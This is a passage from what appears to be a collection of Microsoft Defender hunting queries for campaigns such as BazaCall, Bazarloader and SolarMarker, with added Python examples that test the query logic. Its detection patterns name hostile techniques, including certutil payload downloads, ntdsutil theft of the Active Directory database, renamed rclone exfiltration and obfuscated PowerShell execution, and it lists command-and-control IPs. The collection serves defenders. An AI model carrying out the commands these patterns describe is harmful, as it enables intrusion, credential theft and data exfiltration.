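    "DeviceProcessEvents": [
        {"Timestamp": NOW - timedelta(hours=3), "DeviceName": "ws01", "FileName": "invoice.exe", "SHA256": H_A},
        {"Timestamp": NOW - timedelta(hours=3), "DeviceName": "ws01", "FileName": "notepad.exe", "SHA256": H_C},
    ],
    "DeviceFileEvents": [
        # Older than MaxAge: dropped by the Timestamp filter although the hash is in the feed.
        {"Timestamp": NOW - timedelta(days=3), "DeviceName": "ws02", "FileName": "loader.dll", "SHA256": H_B},
    ],
    "DeviceImageLoadEvents": [
        {"Timestamp": NOW - timedelta(minutes=30), "DeviceName": "ws03", "FileName": "loader.dll", "SHA256": H_B.upper()},
    ],
}

if __name__ == "__main__":
    for hit in hunt(parse_feed(SAMPLE_FEED), SAMPLE_EVENTS, timedelta(days=1), NOW):
        print(hit)
```

Running it surfaces the process event on ws01 and the image load on ws03; the file event on ws02 is outside the one-day window, exactly as the MaxAge filter in the KQL would drop it.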
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Exploit | v | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | v | |
## Contributor info
**Contributor:** Michael Melone
**GitHub alias:** mjmelone
**Organization:** Microsoft
**Contact info:** @PowershellPoet
================================================
FILE: Campaigns/Abusing settingcontent-ms.txt
================================================
// Sample query that searches for .settingcontent-ms files downloaded from the web
// through Microsoft Edge, Internet Explorer, Google Chrome, Mozilla Firefox or Microsoft Outlook
// For questions @MiladMSFT on Twitter or milad.aslaner@microsoft.com
DeviceFileEvents
| where InitiatingProcessFileName in~ ("browser_broker.exe", "chrome.exe", "iexplore.exe", "firefox.exe", "outlook.exe")
| where FileName endswith ".settingcontent-ms"
// The FileOrigin* columns are available only on Edge and Chrome and from Windows 10 version 1703
// https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-Browser-downloads/td-p/220454
| project Timestamp, DeviceName, FileName, FolderPath, FileOriginUrl, FileOriginReferrerUrl, FileOriginIP
================================================
FILE: Campaigns/Bazacall/Bazacall Emails.md
================================================
# Bazacall emails
Bazacall malware uses emails that contain a phone number for the user to call in order to cancel a fake subscription. These emails contain no links or attachments, and use automatic payment lures to trick users into contacting the number included in the email.
## Query
This query looks for the subject lines associated with known Bazacall emails, using a regex to match on the fake account number pattern and a few keywords that are frequently used in these subjects. NOTE: Some emails contain the fake account number in the body of the email rather than the subject. In these instances, searching on keyword alone may surface related emails. Verify maliciousness by matching the regex for the account number in the body of the email if possible.
```
EmailEvents
| where Subject matches regex @"[A-Z]{1,3}\d{9,15}"
and Subject has_any('trial', 'free', 'demo', 'membership', 'premium', 'gold', 'notification', 'notice', 'claim', 'order', 'license', 'licenses')
```
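The subject check above, together with the body fallback the note describes, as an added example that is not part of the repository: the same regex and keyword list are run in Python over constructed emails, and an email whose subject carries a keyword but whose account number only appears in the body is reported separately. Senders, subjects, bodies and account numbers are made up; `has_any` here approximates KQL term matching.

```python
"""BazaCall subject hunt plus body fallback over constructed emails.
Added example, not repository code."""
import re

# Same pattern as the KQL `matches regex`; both engines are case-sensitive,
# so the letter prefix must be upper case.
ACCOUNT_RE = re.compile(r"[A-Z]{1,3}\d{9,15}")
KEYWORDS = ("trial", "free", "demo", "membership", "premium", "gold", "notification",
            "notice", "claim", "order", "license", "licenses")
TERM_RE = re.compile(r"[A-Za-z0-9]+")


def has_any(text, terms):
    """Approximate KQL has_any: case-insensitive match on whole terms, so
    'free' matches 'Free trial' but not 'freely'."""
    tokens = {t.lower() for t in TERM_RE.findall(text)}
    return any(term in tokens for term in terms)


def classify(email):
    """Return (how, account): 'subject' when the subject alone satisfies the
    query, 'body' when only the fallback does, (None, None) otherwise."""
    subject, body = email["Subject"], email.get("Body", "")
    if not has_any(subject, KEYWORDS):
        return None, None
    m = ACCOUNT_RE.search(subject)
    if m:
        return "subject", m.group(0)
    m = ACCOUNT_RE.search(body)
    if m:
        return "body", m.group(0)
    return None, None


def triage(emails):
    """One row per email the query (or the body fallback) would surface."""
    rows = []
    for e in emails:
        how, account = classify(e)
        if how:
            rows.append({"Sender": e["SenderFromAddress"], "Subject": e["Subject"],
                         "MatchedIn": how, "Account": account})
    return rows


SAMPLE_EMAILS = [  # constructed
    {"SenderFromAddress": "billing@example.net",
     "Subject": "Your premium trial KZ1234567890 has been renewed",
     "Body": "Call us to cancel."},
    {"SenderFromAddress": "noreply@example.org",
     "Subject": "Notice: subscription payment processed",
     "Body": "Account number AB987654321012. Call 555-0100 to cancel."},
    {"SenderFromAddress": "shop@example.com",
     "Subject": "Order confirmation #4532", "Body": "Thanks for your purchase."},
    {"SenderFromAddress": "hr@example.com",
     "Subject": "Freely available training WK2021", "Body": ""},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EMAILS):
        print(row)
```

The third and fourth emails show the two ways a lure-like subject falls through: a keyword with no account-number pattern anywhere, and a word that merely contains a keyword (`freely`), which term-based `has_any` does not match.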
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Cobalt Strike Lateral Movement.md
================================================
# Bazacall Cobalt Strike Lateral Movement
Microsoft has observed Bazacall using Cobalt Strike in order to move laterally to other machines on the network.
## Query
This query looks for alerts related to Cobalt Strike and its built-in PSExec used for lateral movement.
```
AlertInfo
| where Title in("File dropped and launched from remote location", "Suspicious transfer of an executable file")
// Joining in instances where Cobalt Strike's built-in PsExec is used for lateral movement
| join AlertEvidence on $left.AlertId == $right.AlertId
| where FileName matches regex @"^([a-z0-9]){7}\.exe$" and FileName matches regex "[0-9]{1,5}"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Dropping payload via certutil.md
================================================
# BazaCall dropping payload via certutil.exe
BazaCall is a campaign that manipulates users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Excel file, they are prompted to enable a malicious macro that infects their device with BazaLoader.
This query hunts for an attacker-created copy of *certutil.exe*, a legitimate process, which the macro uses to download BazaLoader.
## Query
```kusto
DeviceFileEvents
| where InitiatingProcessFileName !~ "certutil.exe"
| where InitiatingProcessFileName !~ "cmd.exe"
| where InitiatingProcessCommandLine has_all("-urlcache", "split", "http")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Excel Macro Execution.md
================================================
# Bazacall Excel Macro Execution
Bazacall uses malicious macro-enabled Excel documents to execute their payload.
## Query
This query looks for the malicious macro being executed on a machine.
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "excel.exe"
and ProcessCommandLine has_all('mkdir', '&& copy', 'certutil.exe')
```
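The two queries above ("Dropping payload via certutil" and "Excel Macro Execution") both rely on KQL's `has`/`has_all` term matching and on name exclusions. The following is an added Python example, not code from this repository, that reproduces that logic over constructed telemetry rows so the matching behaviour can be checked offline. The `kql_has` helper approximates KQL `has` (case-insensitive, term bounded by non-alphanumerics); the file names, paths and URLs in the sample rows are constructed placeholders, not indicators from the campaign.

```python
import re

def kql_has(text: str, term: str) -> bool:
    """Approximate KQL `has`: case-insensitive, and `term` must be bounded by
    non-alphanumeric characters or string edges, so "urlcache" matches
    "-urlcache" but not "xurlcachey". KQL's term index differs in details;
    this is close enough for command-line hunting logic."""
    pattern = r"(?<![0-9a-z])" + re.escape(term.lower()) + r"(?![0-9a-z])"
    return re.search(pattern, text.lower()) is not None

def kql_has_all(text: str, terms) -> bool:
    """KQL `has_all`: every term must be present."""
    return all(kql_has(text, t) for t in terms)

def is_renamed_certutil_download(event: dict) -> bool:
    """Mirrors 'Dropping payload via certutil': the process carries certutil's
    -urlcache/split/http switches but is NOT named certutil.exe or cmd.exe,
    i.e. an attacker-created copy running under another name."""
    name = event["InitiatingProcessFileName"].lower()
    if name in ("certutil.exe", "cmd.exe"):      # the two !~ exclusions
        return False
    return kql_has_all(event["InitiatingProcessCommandLine"],
                       ("-urlcache", "split", "http"))

def is_excel_certutil_staging(event: dict) -> bool:
    """Mirrors 'Excel Macro Execution': a child of excel.exe whose command line
    creates a directory and copies certutil.exe into it."""
    if event["InitiatingProcessFileName"].lower() != "excel.exe":
        return False
    return kql_has_all(event["ProcessCommandLine"],
                       ("mkdir", "&& copy", "certutil.exe"))

# Constructed sample telemetry (hypothetical names, paths and URLs).
FILE_EVENTS = [
    {"InitiatingProcessFileName": "certutil.exe",        # genuine name: excluded
     "InitiatingProcessCommandLine":
         "certutil.exe -urlcache -split -f http://example.invalid/x a.dat"},
    {"InitiatingProcessFileName": "cu.exe",              # renamed copy: flagged
     "InitiatingProcessCommandLine":
         "C:\\ProgramData\\x\\cu.exe -urlcache -split -f http://example.invalid/x a.dat"},
    {"InitiatingProcessFileName": "updater.exe",         # benign: no urlcache/split
     "InitiatingProcessCommandLine":
         "updater.exe --check http://example.invalid/version"},
]
PROCESS_EVENTS = [
    {"InitiatingProcessFileName": "EXCEL.EXE",           # case-insensitive =~ match
     "ProcessCommandLine":
         "cmd.exe /c mkdir C:\\ProgramData\\x && copy "
         "C:\\Windows\\System32\\certutil.exe C:\\ProgramData\\x\\cu.exe"},
    {"InitiatingProcessFileName": "explorer.exe",        # same strings, wrong parent
     "ProcessCommandLine":
         "cmd.exe /c mkdir C:\\Temp\\build && copy src\\certutil.exe C:\\Temp\\build"},
]

def flagged_file_events():
    """Initiating process names the certutil query would surface."""
    return [e["InitiatingProcessFileName"] for e in FILE_EVENTS
            if is_renamed_certutil_download(e)]

def flagged_process_events():
    """Parent process names the Excel macro query would surface."""
    return [e["InitiatingProcessFileName"] for e in PROCESS_EVENTS
            if is_excel_certutil_staging(e)]

if __name__ == "__main__":
    print("renamed certutil downloads:", flagged_file_events())  # ['cu.exe']
    print("excel-spawned certutil staging:", flagged_process_events())  # ['EXCEL.EXE']
```

Note the asymmetry the two queries exploit: the macro query catches the copy being made (parent is Excel), while the certutil query catches the copy being used (any parent name except the genuine one), so a renamed binary does not escape the second check.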
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Excel file download domain pattern.md
================================================
# BazaCall Excel file download domain pattern
BazaCall is a campaign that manipulates users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Excel file, they are prompted to enable a malicious macro that infects their device with BazaLoader.
This query surfaces connections to the distinctive *.xyz* domains that the BazaCall campaign uses to host malicious Excel files.
## Query
```kusto
DeviceNetworkEvents
| where RemoteUrl matches regex @".{14}\.xyz/config\.php"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Malicious Excel Delivery.md
================================================
# Bazacall Malicious Excel Delivery
Bazacall uses malicious Excel files to execute payloads on affected devices.
## Query
This query looks for files that are downloaded from URL paths known to be associated with the Bazacall threat.
```
DeviceFileEvents
| where FileOriginUrl has "/cancel.php" and FileOriginReferrerUrl has "/account"
or FileOriginUrl has "/download.php" and FileOriginReferrerUrl has "/case"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/NTDS theft.md
================================================
# Bazacall NTDS.dit Theft
Microsoft has observed compromises related to Bazacall resulting in theft of the Active Directory database using ntdsutil.exe.
## Query
This query looks for copies of NTDS created in specific file paths known to be associated with the Bazacall threat.
```
DeviceProcessEvents
| where FileName =~ "ntdsutil.exe"
| where ProcessCommandLine has_any("full", "fu")
| where ProcessCommandLine has_any ("temp", "perflogs", "programdata")
// Exclusion
| where ProcessCommandLine !contains @"Backup"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Renamed Rclone Exfil.md
================================================
# Bazacall Renamed Rclone for Exfiltration
Microsoft has observed Bazacall using a renamed version of Rclone for data exfiltration.
## Query
This query looks for Rclone being renamed to be used for data exfiltration.
```
DeviceProcessEvents
| where ProcessVersionInfoProductName has "rclone" and not(FileName has "rclone")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/RunDLL Suspicious Network Connection.md
================================================
# RunDLL Suspicious Network Connections
During the chain of events from Bazacall to Bazaloader, RunDLL makes several network connections, including to command-and-control (C2) infrastructure. The command line for these connections contains a specific process parameter, ",GlobalOut", that can surface potentially malicious activity related to Bazacall and Bazaloader.
## Query
This query looks for network connection events made by the RunDll32.exe process that have a command line that contains the ",GlobalOut" process parameter.
```
DeviceNetworkEvents
| where InitiatingProcessFileName =~ 'rundll32.exe' and InitiatingProcessCommandLine has ",GlobalOut"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazarloader/Stolen Images Execution.md
================================================
# Stolen Images
The "Stolen Images" Bazarloader campaign uses fake copyright infringement contact form emails and malicious files pretending to contain "stolen images" to trick users into downloading the malware.
## Query
This query looks for instances of Wscript being used to execute the malicious "stolen images" file associated with this Bazarloader campaign.
```
DeviceProcessEvents
| where FileName =~ "wscript.exe" and ProcessCommandLine has_all("stolen", "images")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazarloader/Zip-Doc - Creation of JPG Payload File.md
================================================
# Zip-Doc - Creation of JPG Payload File
In the campaign where Bazarloader is delivered via emails containing password-protected zip attachments, regsvr32.exe is used to launch a malicious payload that is disguised as a JPG file.
## Query
This query looks for instances of regsvr32.exe launching a file with a .jpg extension and summarizes the file name, SHA256, and Device ID for easy analysis.
```
DeviceImageLoadEvents
| where InitiatingProcessFileName =~ "regsvr32.exe" and InitiatingProcessCommandLine has ".jpg" and FileName endswith ".jpg"
| summarize by FileName, SHA256, DeviceId, bin(Timestamp, 1d)
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazarloader/Zip-Doc - Word Launching MSHTA.md
================================================
# Zip-Doc - Word Launching MSHTA
In the password-protected zip attachment -> Word document delivery method of Bazarloader, Word creates an .hta file and launches it via MSHTA to connect to a malicious domain and pull down the Bazarloader payload.
## Query
This query looks for instances of Microsoft Word creating an .hta file, as seen through a cmd.exe child process of WINWORD.EXE whose command line references "hta".
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'WINWORD.EXE' and FileName =~ 'cmd.exe' and ProcessCommandLine has_all('hta')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bear Activity GTR 2019.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FileName =~ "xcopy.exe" and ProcessCommandLine has @" /S /E /C /Q /H \")
or (FileName =~ "adexplorer.exe" and ProcessCommandLine has @" -snapshot """" c:\users\")
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Cloud Hopper.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ @"cscript.exe" and ProcessCommandLine has ".vbs /shell "
| top 100 by Timestamp desc
================================================
FILE: Campaigns/DofoilNameCoinServerTraffic.txt
================================================
// This query retrieves the last 30 days of network connections to known Dofoil NameCoin servers
// The full article is available here: https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/
DeviceNetworkEvents
| where RemoteIP in (
"139.59.208.246","130.255.73.90","31.3.135.232","52.174.55.168","185.121.177.177","185.121.177.53",
"62.113.203.55","144.76.133.38","169.239.202.202","5.135.183.146","142.0.68.13","103.253.12.18",
"62.112.8.85","69.164.196.21","107.150.40.234","162.211.64.20","217.12.210.54","89.18.27.34",
"193.183.98.154","51.255.167.0","91.121.155.13","87.98.175.85","185.97.7.7")
| project DeviceName, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteIP, RemotePort
================================================
FILE: Campaigns/Dopplepaymer In-Memory Malware Implant.txt
================================================
///////////////////////////////////////////////////////////////////
// Dopplepaymer In-Memory Malware Implant
//
// This query identifies processes with command line launch strings
// which match the pattern used in Dopplepaymer ransomware attacks.
///////////////////////////////////////////////////////////////////
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine startswith "-q -s {{" and ProcessCommandLine contains "}} -p "
================================================
FILE: Campaigns/Dragon Fly.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "crackmapexec.exe"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Elise backdoor.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FolderPath =~ @"C:\Windows\SysWOW64\cmd.exe" and ProcessCommandLine has @"\Windows\Caches\NavShExt.dll")
or (ProcessCommandLine endswith @"\AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll,Setting")
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Equation Group C2 Communication.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FolderPath endswith @"\rundll32.exe" and ProcessCommandLine endswith ",dll_u")
or ProcessCommandLine has " -export dll_u "
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Hurricane Panda activity.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine endswith " localgroup administrators admin /add"
or ProcessCommandLine has @"\Win64.exe"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Judgement Panda exfil activity.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has @"\ldifde.exe -f -n "
or ProcessCommandLine has @"\7za.exe a 1.7z "
or ProcessCommandLine endswith @" eprod.ldf"
or ProcessCommandLine has @"\aaaa\procdump64.exe"
or ProcessCommandLine has @"\aaaa\netsess.exe"
or ProcessCommandLine has @"\aaaa\7za.exe"
or ProcessCommandLine has @"copy .\1.7z \"
or ProcessCommandLine has @"copy \client\c$\aaaa\"
or FolderPath == @"C:\Users\Public\7za.exe"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Jupyter-Solarmaker/deimos-component-execution.md
================================================
# Jupyter AKA SolarMarker
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities. It proliferates mainly through search engine optimization manipulation and malicious advertising that lure users into downloading malicious templates and documents. This malware has been prevalent since 2020 and is still active as of 2021.
# Deimos malware component execution
The following query checks specifically for the AMSI script content that signals the Deimos malware component loading for execution. This is most often loaded by Jupyter, but may also accompany other malware or Jupyter variants.
## Query
```
DeviceEvents
| where InitiatingProcessFileName =~ "powershell.exe"
| where ActionType == "AmsiScriptContent"
| where AdditionalFields endswith '[mArS.deiMos]::inteRaCt()"}'
| project InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, ActionType, AdditionalFields
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | v | |
| Command and control | | |
| Exfiltration | v | |
| Impact | v | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Jupyter-Solarmaker/evasive-powershell-executions.md
================================================
# Jupyter AKA SolarMarker
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities. It proliferates mainly through search engine optimization manipulation and malicious advertising that lure users into downloading malicious templates and documents. This malware has been prevalent since 2020 and is still active as of 2021.
# Jupyter's evasive PowerShell executions
The following query checks for instances of Jupyter or SolarMarker malware that launch a lengthy PowerShell script, which in turn reads from encoded strings to parse the next malicious script. The initiating process name for this will almost always end in ".tmp" and reflect the original downloaded executable name.
## Query
```
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_all
("-command","FromBase64String","));remove-item $",".length;$j++){$","$i++;if($i -ge $","-bxor","UTF8.GetString")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Jupyter-Solarmaker/evasive-powershell-strings.md
================================================
# Evasive PowerShell with uncommon read strings
This query searches for a string pattern seen in evasive PowerShell usage. Jupyter or SolarMarker iterates on this pattern multiple times to read data and call additional processes. This query is not fully specific to Jupyter or SolarMarker and will also return other malware families, but it is unlikely to return false positives.
## Query
```kusto
DeviceProcessEvents
// Case-insensitive match, consistent with the other queries in this collection
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_all("-ep bypass","-command","get-content","remove-item","iex")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Jupyter-Solarmaker/successive-tk-domain-calls.md
================================================
# Jupyter AKA SolarMarker
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities. It proliferates mainly through search engine optimization manipulation and malicious advertising that lure users into downloading malicious templates and documents. This malware has been prevalent since 2020 and is still active as of 2021.
# Jupyter's SEO Delivery via .TK domains
